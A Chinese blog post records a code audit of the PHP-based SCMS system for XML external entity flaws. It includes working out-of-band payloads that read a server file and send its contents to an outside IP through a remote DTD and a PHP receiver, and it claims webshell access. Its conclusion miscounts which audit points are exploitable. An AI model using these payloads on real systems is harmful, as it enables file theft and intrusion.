SCMS系统基于PHP的XXE漏洞分析

已于 2023-12-15 11:23:43 修改
阅读量118 收藏
点赞数
分类专栏: 信息安全 文章标签: php android 开发语言
于 2023-12-15 11:20:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61529962/article/details/135012683
版权

SCMS漏洞分析(XXE)

众所周知,xxe是围绕xml的漏洞,所以此漏洞入手的方法就是查找PHP代码中对xml代码进行解析的函数或者xml关键字
常见函数:

file_get_contents("php://input")、simplexml_load_string

xml格式中自带的关键字:

SYSTEM、ENTITY、ELEMENT

针对SCMS系统展开代码审计

审计代码,全局搜索simplexml_load_string(xml处理函数),一共有7个。

  • 第一个

$postArr = $GLOBALS['HTTP_RAW_POST_DATA']此函数在PHP中类似于file_get_contents("php://input"),服务器获取浏览器的输入流。这里并没有对输入的xml做过滤处理,继续往下审计代码,没有发现回显点,暂时定义为xxe盲注。

补充:这里介绍一下传统三步走
  • 第一步:构造传入目标服务器的payload
    • //声明xml文件
<?xml version = "1.0"?>
<!DOCTYPE test [
        //声名调用外部实体
        <!ENTITY % file SYSTEM "file:///D:/666.txt">
        <!ENTITY % dtd SYSTEM "http://47.108.223.48/xxe/remote.dtd">
        %dtd;
        %send;
]>
  • 第二步:在自己服务器创建要调用的php漏洞文件
    • //用file_put_contents方法在目标服务器上传1.txt文件,内容为$_GET['data']
<?php file_put_contents('1.txt',$_GET['data']);
  • 第三步:在自己服务器创建要调用的dtd文件
    • //再次申明调用外部实体,去访问上面写好的php文件传到目标服务器
<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM
'http://47.108.223.48/xxe/remote.php?data=%file;'>">
%payload;

回到正题,对第一个漏洞处抓包

修改传入的参数,post方法传入构造的payload,放行

payload

<?xml version = "1.0"?>
<!DOCTYPE test [
        //声名调用外部实体
        <!ENTITY % file SYSTEM "file:///D:/666.txt">
        <!ENTITY % dtd SYSTEM "http://47.108.223.48/xxe/remote.dtd">
        %dtd;
        %send;
]>

可以看到发生了报错(PHP版本原因无伤大雅),同时爆出了目标服务器D:/666.txt这个文件的所有信息。然后会在目标服务器生成一个1.txt的文件夹,访问这个文件夹传入准备好的php漏洞参数即可拿到webshell

  • 第二个

路径写死,此路不通

  • 第四个、第五个

路径被限制,此路不通

  • 第六个

获取浏览器输入流,判断了signature、echostr是否都为空,在传输参数的时候满足一个不为空即可
$signature = $_REQUEST["signature"];
$echostr = $_REQUEST["echostr"];

抓包

构造payload

<?xml version = "1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///D:/666.txt">
<!ENTITY % dtd SYSTEM "http://47.108.223.48/xxe/remote.dtd">
%dtd;
%send;
]>

和第一个相同的漏洞原理,可以看到发生了报错(PHP版本原因无伤大雅),同时爆出了目标服务器D:/666.txt这个文件的所有信息。然后会在目标服务器生成一个1.txt的文件夹,访问这个文件夹传入准备好的php漏洞参数即可拿到webshell

  • 第七个

libxml_disable_entity_loader(true);开发语言禁用外部实体为ture,无法操作

审计结束

审计simplexml_load_string函数一共发现两个漏洞点为第一个和第七个均可拿到webshell
€On my way•£
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SCMS.rar_课程管理系统
09-21
一个基本的学院课程管理系统,包括添加学生、课程,查询各种相关信息等等。
CVE-2018-18760(犀牛(RhinOS) CMS3.X任意文件下载漏洞
Fly_鹏程万里
12-21 736
简介 RhinOS是一个使用最新功能开发网站的框架,可以为Web门户提供最快的访问和管理。RhinOSCMS对于网站管理功能十分强劲,内置允许使用数据库进程和解析器模块快速访问数据库,xml和其他资源,购物车,标签和参数化文件,配置参数,Intranet访问,数据库会话,电子邮件发送,验证码安全系统,快速过滤,列表和详细信息的模块,功能可谓是非常之多了。RhinOSCMS的download.ph...
S-CMS医院建站系统XXE通用漏洞的利用与防御
seek_2022的博客
03-17 7374
本文首先对XXE漏洞和XML文档的结构进行了简单介绍,并对S-CMS进行代码审计找出漏洞利用点,并介绍了漏洞的利用过程和防御方法。
代码审计之scms——search.php注入漏洞
weixin_40709439的博客
01-18 2432
电脑没网络,只能在本地审计之前审计过的cms,这次审计scms 还是法师审计工具自动审计一波,发现可能存在漏洞的文件,发现fearch.php可能存在sql注入。 &amp;lt;?php require 'conn/conn.php'; require 'conn/function.php'; $action=$_GET[&quot;action&quot;]; $keyword=$_REQUEST[&quot;keyword&quot;]...
【安鸾渗透实战平台】实战渗透/企业网站
qq_34485854的博客
11-17 1494
靶场WP
S-CMS企建v3二次SQL注入
xiaoi123的博客
12-20 682
S-CMS企建v3二次SQL注入 0x01 前言 继上一篇的S-CMS漏洞再来一波!首发T00ls 0x2 目录 Sql注入 二次SQL注入 0x03 Sql注入 漏洞文件:\scms\bbs\bbs.php $action=$_GET["action"]; $S_id=$_GET["S_id"]; if($action=="add"){ $B_title=htmlspecialc...
安鸾渗透实战平台--综合渗透--企业网站渗透流程
jjpsb的博客
03-30 6337
本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag,但flag并未提示具体位置。 出于学习和记录目的,由于本人也是小白,错误的地方望指点 准备工作: 实验环境:安鸾学院-powered by S-CMS 渗透工具使用: Burpsuite Sqlmap 蚁剑(中国菜刀) Whatweb Dirsearch 实验目的: 获得webshell 寻找flag 渗透流程: 信息收集、寻找渗透点 初步使用浏览器正常浏览了一...
积客B2SCMS商城系统 v1.0
10-25
积客B2Scms程序开发采用的是PHP+MYSQL数据库,使系统的安全、稳定、负载得到保障;使用大量Web2.0新技术使系统拥有一流用户体验。PHP是简单、现代、安全的语言,使系统更加可靠、安全、稳定。  积客B2Scms采用目前...
积客B2SCMS商城系统 v1.0.zip
07-07
积客B2Scms程序开发采用的是PHP MYSQL数据库,使系统的安全、稳定、负载得到保障;使用大量Web2.0新技术使系统拥有一流用户体验。PHP是简单、现代、安全的语言,使系统更加可靠、安全、稳定。  积客B2Scms采用目前...
SCMS内容管理系统v1.0.1
07-26
SCMS是一个安全内容管理系统的基础引擎,基于角色的面向对象设计,兼容XHTML 1.0、Strict I/0验证;定制session实现,支持基于SSL的cookie等,具备很强的安全特性,采用 PHP MySQL开发。 SCMS 1.0.1 更新内容: 该...
scms审计笔记之注入
weixin_40709439的博客
12-19 583
1.在buy.php。69到71 行 sql=&amp;quot;select∗fromSLproductwherePid=&amp;quot;.sql=&amp;quot;select * from SL_product where P_id=&amp;quot;.sql="select∗fromSLp​roductwherePi​d=".P_id; result=mysqliquery(re...
XXE - 实体注入
净邪的博客
06-26 1251
什么是xxeXXE = XML External Entity 即外部实体,从安全角度理解成XML External Entity attack XML外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分 拆分开来简单点来说就是: XML: 官方介绍: XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。.
SCMS读书笔记一——SCMS组件功能介绍
weishuang的博客
02-11 1947
SCMS组件及功能 SCMS管理器(SCMS Manager):保证SCMS有效和公平运行,定义组织和技术策略,为审查不良行为和撤销请求设置指导方针,确保它们按照流程是正确和公平的。 认证服务(Certification Services):指定认证流程,提供有关哪些类型的设备被证实接收数字证书的信息。 CRL存储(CRL Store):一个简单的传递组件,存储和分发CRL。 CRL广播(...
字符画生成网站 ascii字符画
wow_awsl_qwq的博客
05-12 111
_____ / ___/__ ___ / /__/ _ \/ _ \ \___/ .__/ .__/ /_/ /_/
NSSCTF | [第五空间 2021]WebFTP
最新发布
2302_80946742的博客
05-13 44
注意看这里的题目标签,目录扫描,.git泄露。那么这道题虽然打开是一个登录的界面,但是并不是我们熟悉的爆破和SQL注入。扫描的最后也给了几个文件,最后是在phpinfo.php文件里找到了flag。但是可以在题目标签上看到目录扫描,我们就用dirsearch扫一扫看看。虽然这里扫出来了git文件,但我试了试,没能成功下载。
如何防止WordPress网站内容被抓取
AIDigital的博客
05-09 426
最近在检查网站服务器的访问日志的时候,发现了大量来自同一个IP地址的的请求,用站长工具分析确认了我的网站内容确实是被他人的网站抓取了,我第一时间联系了对方网站的服务器提供商投诉了该网站,要求对方停止侵权行为,然而这只能暂时性的解决问题,为了避免以后再有意外发生,我结合了咨询Hostease的技术支持得到的反馈以及自己从网上了解到的信息,做了以下的优化,分享出来希望能对大家有一些帮助。抓取工具在抓取网站内容的时候,需要依赖网站的RSS feed,对RSS feed做一些小的调整,就可以防止内容被抓取。
Linux网站服务
c5zm51zjr的博客
05-08 792
注:Discuz软件包安装2.5版本的,若没有需要去官网论坛上寻找,找到之后复制链接下载即可。网站架构:LAMP: Linux+Apache+MYSQL+PHP(系统+服务器程序+数据管理软件+中间软件)主配置文件:/etc/httpd/conf/httpd.conf。主目录:/var/www/html (源代码默认位置)子配置文件:/etc/httpd/conf.d/*注:网站a.org无需授权,b.org需要授权。网站:多个网页组合而成的一台网站服务器。URL:统一资源定位符,访问网站的地址。
picoCTF-Web Exploitation-Web Gauntlet
huckers的博客
05-12 379
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除。中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入。提示sql过滤or,我们使用。
org.hibernate.HibernateException: Wrong column type in SCMS.SCMS_MESSAGE for column created. Found: date, expected: timestamp
06-03
这个异常通常是由于实体类中的属性类型与数据库表中对应列的数据类型不匹配所导致的。...ALTER TABLE SCMS.SCMS_MESSAGE MODIFY created timestamp; ``` 最后,重启应用程序并重新运行应该能够解决这个问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值